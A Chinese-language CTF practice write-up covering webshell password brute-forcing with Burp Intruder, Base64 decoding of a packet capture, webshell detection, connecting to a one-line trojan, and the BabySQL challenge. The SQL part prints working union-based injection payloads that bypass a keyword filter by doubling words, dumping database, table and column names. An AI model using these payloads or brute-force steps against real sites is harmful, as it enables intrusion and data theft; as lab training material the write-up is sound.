CTF刷题04
网站被黑
访问题目地址
用御剑扫一下,发现了一个shell.php
访问shell.php,随便输入一个,然后用burpsuite抓包
右键,点击Send to Intruder
Payload type:选择Simple list,Add from list选择Passwords,然后点击右上方的Start attack
发现当payload为hack,length为1110
提交hack,得到flag
数据包中的线索
题目描述:公安机关近期截获到某网络犯罪团伙在线交流的数据包,但无法分析出具体的交流内容,聪明的你能帮公安机关找到线索吗? 注意:得到的 flag 请包上 flag{} 提交
下载附件,用wireshark打开。
追踪http流,发现了一段密文,密文以=结尾,猜想应该是Base64
进行Base64解码,发现都是乱码。
换个Base64解密网站,继续进行解密,发现是转存为了jpg文件,怪不得会乱码。
下载图片,flag就出来了
后门查杀
题目描述:
小白的网站被小黑攻击了,并且上传了Webshell,你能帮小白找到这个后门么?(Webshell中的密码(md5)即为答案)。 注意:得到的 flag 请包上 flag{} 提交
将下载的附件解压,然后使用D盾扫描,发现了两个可疑的文件。
查看一下这两个文件,在其中一个文件中发现了flag。
[极客大挑战 2019]Knife
使用蚁剑进行操作,一句话木马中给出密码是Syc,进行添加。
点击进入添加的地址
查看目录,看到flag文件
点击flag文件,得到flag。
[极客大挑战 2019]BabySQL
1. 万能密码注入
尝试万能密码 1' or 1=1 #
,报错语句中没有看到or,or被过滤
尝试双写or:1' oorr 1=1 #
,没有报错,应该是双写绕过
2. 查字段
构造payload:
?username=admin&password=pwd %27 union select 1 %23
报错提示中只保留了 1# ,说明union和select都被过滤了
双写union和select,继续注入
?username=admin&password=123456 %27 ununionion seselectlect 1 %23
注入成功,但报错语句告诉我们列数不对
继续构造payload:
?username=admin&password=123456 %27 ununionion seselectlect 1,2,3 %23
发现注入成功,字段为3
3. 爆数据库
Payload:
?username=admin&password=123456%20%27 ununionion seselectlect 1,2,database() %23
获取到当前库名为geek
查看所有库名
Payload:
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom
(infoorrmation_schema.schemata) %23
看到了一个名为ctf的数据库,flag应该在这
- 查表
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables)whwhereere table_schema="ctf" %23
发现了一个名为Flag的表
- 查字段名
构造payload:
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name="Flag"%23
- 获取数据
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23
得到flag